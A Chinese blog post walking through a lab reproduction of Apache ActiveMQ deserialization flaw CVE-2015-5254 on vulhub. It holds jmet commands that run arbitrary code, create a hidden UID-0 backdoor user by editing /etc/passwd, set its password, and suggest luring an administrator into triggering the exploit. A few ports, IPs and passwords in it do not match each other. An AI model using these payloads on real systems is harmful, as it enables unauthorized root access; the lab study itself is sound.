apache ActiveMQ反序列化漏洞（CVE-2015-5254）复现

最新推荐文章于 2025-04-09 21:03:09 发布

原创最新推荐文章于 2025-04-09 21:03:09 发布

· 816 阅读

0 ·

版权

文章标签：

#linux #docker #安全

漏洞复现专栏收录该内容

8 篇文章

订阅专栏

前言：又来复现漏洞了！
基本的实验环境就不演示了，可以查看我以前的博客，开整吧！

漏洞详情
Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。Apache　ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类
漏洞危害#
远程攻击者可借助特制的序列化的Java MessageService(JMS)ObjectMessage对象利用该漏洞执行任意代码
漏洞编号#
CVE-2015-5254
影响范围#
Apache ActiveMQ 5.13.0之前5.x版本中
修复建议#
升级到最新版本

有WAF的可以配置相关规则进行拦截

实验环境

攻击机：kali 2020.2
靶机：CentOS Linux 7
项目地址：https://github.com/vulhub/vulhub

基础环境搭建

查看我以前的博客自行搭建

实验环境搭建
项目地址

https://github.com/vulhub/vulhub

vulhub-master/vulhub-master/activemq/CVE-2015-5254

启动docker编译

docker-compose up -d

环境运行后，将监听61616和8161两个端口其中61616是工作端口，消息在这个端口进行传递;8161是网络管理页面端口访问http://192.168.91.133:8161即可看到网络管理页面，不过这个漏洞理论上是不需要网络的。默认的用户名/密码为admin/admin
在这里插入图片描述

复现步骤
1.漏洞利用过程如下：
a.构造（可以使用ysoserial）可执行命令的序列化对象
b.作为一个消息，发送给目标61616端口
c.访问的Web管理页面，读取消息，触发漏洞

2.使用jmet进行漏洞利用:
首先下载jmet的jar文件，并在同目录下创建一个external文件夹（否则可能会爆文件夹不存在的错误）。jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。

cd /opt
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external

执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME   192.168.91.133   6161

此时会给目标的ActiveMQ添加一个名为事件的队列，可以我们通过http://192.168.91.133:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息
在这里插入图片描述
点击查看这条消息即可触发命令执行

此时进入容器

docker ps   查看容器id
docker exec -it  cc0e9385f975  /bin/bash  进入容器

可看到/ tmp /success已成功创建，说明漏洞利用成功：
在这里插入图片描述
利用漏洞添加用户

1.执行jmet的命令添加test用户并将其添加到root组,返回http://192.168.91.133:8161/admin/browse.jsp?JMSDestination=event页面，点击一下消息，触发它：

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 test" -Yp ROME  192.168.91.133  61616

2.让我们再将passwd中的test的uid修改为0，使它拥有root权限,返回http://192.168.91.133:8161/admin/browse.jsp?JMSDestination=event页面，点击一下消息，触发它。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s/test:x:10010/test:x:0/g" /etc/passwd" -Yp ROME   192.168.91.133  61616

3.让我们再为test用户设置一个密码,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event页面，点击一下消息，触发它。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "test:sd123456" | chpasswd" -Yp ROME   192.168.91.133   61616

在这里插入图片描述

到此为止，一个权限为root，密码为123456的用户即创建完毕。我们可以使用ssh直接远程登陆进入操作系统，并且还是最高权限。如此还可以写文件、弹shell等，可以自行发挥

值得注意的是，通过网络管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下，我们可以诱导管理员访问我们的链接以触发，或者伪装成其他合法服务需要的消息，等待客户端访问的时候触发。